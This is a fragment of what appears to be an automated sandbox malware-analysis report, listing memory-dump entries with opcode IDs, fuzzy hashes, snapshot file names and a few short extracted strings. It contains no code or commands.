                                                                                                  • Opcode ID: c0b410e45f4ef60d7d566f273015dd804d5c016174990256c503e23e05078469
                                                                                                  • Instruction ID: 431ef580c7e4c0396a30bdd4d246a4de1b22c050da7c39a56672bdc154e5a2c4
                                                                                                  • Opcode Fuzzy Hash: c0b410e45f4ef60d7d566f273015dd804d5c016174990256c503e23e05078469
                                                                                                  • Instruction Fuzzy Hash: EF414D30918A1D9FDB44FFA8D4956ED7BA1FF58351F10027AE00DE3296DF35A8818B94
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000035.00000002.2917461086.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_53_2_7ff848e20000_JFQmuJhhcOwSgqtZoqXNEERKgQYwL.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 5H
                                                                                                  • API String ID: 0-1325928868
                                                                                                  • Opcode ID: 6c8d10257877c7e218702e560bf5e879169317a81f17c7bf8d827fc25b6963d5
                                                                                                  • Instruction ID: 842ca5d8dea190c06412d3d6b1c31528ef846d58f1f3e0d6da6e4ea7e1f69874
                                                                                                  • Opcode Fuzzy Hash: 6c8d10257877c7e218702e560bf5e879169317a81f17c7bf8d827fc25b6963d5
                                                                                                  • Instruction Fuzzy Hash: A0410B7091895D9FDB84EF98C499AED7BF1FF58341F10027AE409E3295DB34A881CB94
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000035.00000002.2917461086.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_53_2_7ff848e20000_JFQmuJhhcOwSgqtZoqXNEERKgQYwL.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f7cf72679802be2e84f76400244bfdd42b2cd2eb363e08543c071b8769f6b1e7
                                                                                                  • Instruction ID: ad2c383ce41ede2626564c4eef03b571614929ea85b8967599bbea014c143c03
                                                                                                  • Opcode Fuzzy Hash: f7cf72679802be2e84f76400244bfdd42b2cd2eb363e08543c071b8769f6b1e7
                                                                                                  • Instruction Fuzzy Hash: A4719370D0952A8FEBA4EF18C958BBDB6B5FB58341F5001FAD00DE2691DF746A819F08
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000035.00000002.2917461086.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_53_2_7ff848e20000_JFQmuJhhcOwSgqtZoqXNEERKgQYwL.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 791dd97d5c2f51b5d30fc97e4d7ab5015d3c77b93fe5815e87d2b1914176d9c9
                                                                                                  • Instruction ID: ad4336c1fdac12ec52383d63193c780b4b5a3312347724ca04f90fe21db83e56
                                                                                                  • Opcode Fuzzy Hash: 791dd97d5c2f51b5d30fc97e4d7ab5015d3c77b93fe5815e87d2b1914176d9c9
                                                                                                  • Instruction Fuzzy Hash: 41516970A0891E9FCF84EF58D484AEDBBF1FB58355F05026AE419E7260DA34E9908B94
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000035.00000002.2917461086.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_53_2_7ff848e20000_JFQmuJhhcOwSgqtZoqXNEERKgQYwL.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 211f92db0b7e53b4ca2945c80d16793fc39728e077d9aa56e7461abefa969620
                                                                                                  • Instruction ID: 823bc807106568f9b310d96d1d957cd4d6551e77aefda2d740f006432b8367bb
                                                                                                  • Opcode Fuzzy Hash: 211f92db0b7e53b4ca2945c80d16793fc39728e077d9aa56e7461abefa969620
                                                                                                  • Instruction Fuzzy Hash: B941A0B1A0D68A9FEB02BF68D8462FD7BA0FF46350F0406B6D448971D2CB386545CB99
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000035.00000002.2917461086.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_53_2_7ff848e20000_JFQmuJhhcOwSgqtZoqXNEERKgQYwL.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2d6cda77b688dfcc7edda74d75f9b1936c6aa66ec6a1100966c9b82163965104
                                                                                                  • Instruction ID: c4d54894be13277097a3c504ca728b0e0eae5db862534e7a8b0ac3e5d9d4f211
                                                                                                  • Opcode Fuzzy Hash: 2d6cda77b688dfcc7edda74d75f9b1936c6aa66ec6a1100966c9b82163965104
                                                                                                  • Instruction Fuzzy Hash: 5A21F874A1865E8FDB55EF58C485AFEB7B1FF58354F11062AE84AE3280CB34A941CB84
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000035.00000002.2917461086.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_53_2_7ff848e20000_JFQmuJhhcOwSgqtZoqXNEERKgQYwL.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000035.00000002.2917461086.00007FF848E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_53_2_7ff848e20000_JFQmuJhhcOwSgqtZoqXNEERKgQYwL.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: c9$!k9$"s9$#{9
                                                                                                  • API String ID: 0-1692736845